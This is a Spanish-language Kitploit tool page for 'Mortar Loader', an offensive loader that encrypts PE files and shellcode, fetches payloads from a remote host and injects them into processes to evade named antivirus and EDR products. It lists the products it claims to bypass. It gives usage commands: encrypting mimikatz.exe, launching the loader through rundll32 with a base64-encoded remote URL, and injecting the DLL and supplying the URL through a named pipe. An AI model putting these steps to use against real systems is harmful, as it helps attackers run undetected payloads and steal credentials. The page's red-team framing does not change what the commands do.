Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
mortar — técnica de evasión para derrotar y desviar la detección y prevención de productos de seguridad (AV/EDR/XDR) | Kitploit
Herramientas/GitHubGitHub/0xsp-srd/mortar
Frameworks de ExploitsGeneración de PayloadsEvasión de IDS/IPSShellcodeRed Teaming
GitHub0xsp-srd/mortar

mortar

técnica de evasión para derrotar y desviar la detección y prevención de productos de seguridad (AV/EDR/XDR)

Ver Repositorio
1.5k23820hace 2 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Mortar Loader

Técnica de evasión de red teaming para derrotar y desviar la detección y prevención de productos de seguridad. Mortar Loader realiza el cifrado y descifrado de PE/Shellcode dentro de los flujos de memoria y lo ejecuta aprovechando varias técnicas de inyección. Mortar es capaz de eludir productos antivirus modernos y soluciones XDR avanzadas, y ha sido probado y confirmado para eludir los siguientes:

  • Kaspersky ✔️
  • ESET AV / EDR ✔️
  • Malewarebytes ✔️
  • Mcafee ✔️
  • Windows defender ✔️
  • Cylance ✔️
  • TrendMicro ✔️
  • Bitdefender ✔️
  • Norton Symantec ✔️
  • Sophos EDR ✔️

Características actualizadas

La versión más reciente (v3) se ha lanzado con las siguientes funciones:

  • Ejecución sin archivos con binario cifrado o shellcode remoto escenificado.
  • Inyección APC Early Bird.
  • Suplantación de procesos.
  • Soporte para Named Pipes.
  • Ofuscación de cadenas y llamadas a funciones.
  • Subrutina de recarga encubierta de Mortar.
  • Técnicas de ejecución retardada.

Para una descripción más técnica, consulte la siguiente publicación de blog: https://kpmg.com/nl/en/home/insights/2023/12/mortar-loader.html

Uso

Encryptor

El cifrador cifra shellcode en C y binarios PE y escribe la salida en un archivo .enc. Puede usar cualquier payload (MSF/cobalt/Havoc, etc.) según prefiera, siempre que sea arquitectura x64 y no RAW.

root@kali>./encryptor -f mimikatz.exe -o bin.enc 
root@kali>./encryptor -f shellcode.c -o bin.enc 

Librería Mortar Loader

La nueva versión aprovecha varias técnicas combinadas con la obtención remota de payloads; se recomienda consultar la siguiente publicación para obtener más información.

para instrucciones rápidas

# PE Forking

1. host your encrypted binary on remote host. 
2. encode the final URL with base64. 
3. rundll32.exe agressor.dll,viewlogs [BASE64 URL].
4. covert reload subroutine technique is enabled. 

currently supports early bird injection in combination with Named Pipes to receive variables for final execution.

1. inject Mortar DLL into remote process( DLL injection, Hijacking, sideloading).
2. connect into the named pipe to supply your URL 
   echo {BASE64 URL} > \\.\pipe\moj_ML_ntsvcs 
3. payload will be executed once valid value has been recieved. 

Compilación

El proyecto ha sido codificado usando FPC (Free Pascal); los procedimientos de compilación son sencillos: descargue e instale Lazarus IDE (https://www.lazarus-ide.org/index.php?page=downloads).

Para el cifrador, puede descargarlo desde la sección de lanzamientos o compilarlo fácilmente con Lazarus IDE.

#Debian & Ubuntu 

apt install fpc 
apt install lazarus-ide 

Publicaciones

  • El lanzamiento v1: https://0xsp.com/security%20research%20&%20development%20(SRD)/defeat-the-castle-bypass-av-advanced-xdr-solutions
  • Características de Mortar Loader v2: https://0xsp.com/offensive/mortar-loader-v2/
  • Charla en CrestCon Asia 2021: https://www.youtube.com/watch?v=H7EMBz7GLMk

¿Patrocinador?

El desarrollo de Mortar o cualquier proyecto compartido es el resultado de mi tiempo personal.

  • muestras aprecio continuo por mi trabajo.
  • obtendrás acceso anticipado a versiones previas.
  • haz preguntas / serán respondidas.
Descargar herramienta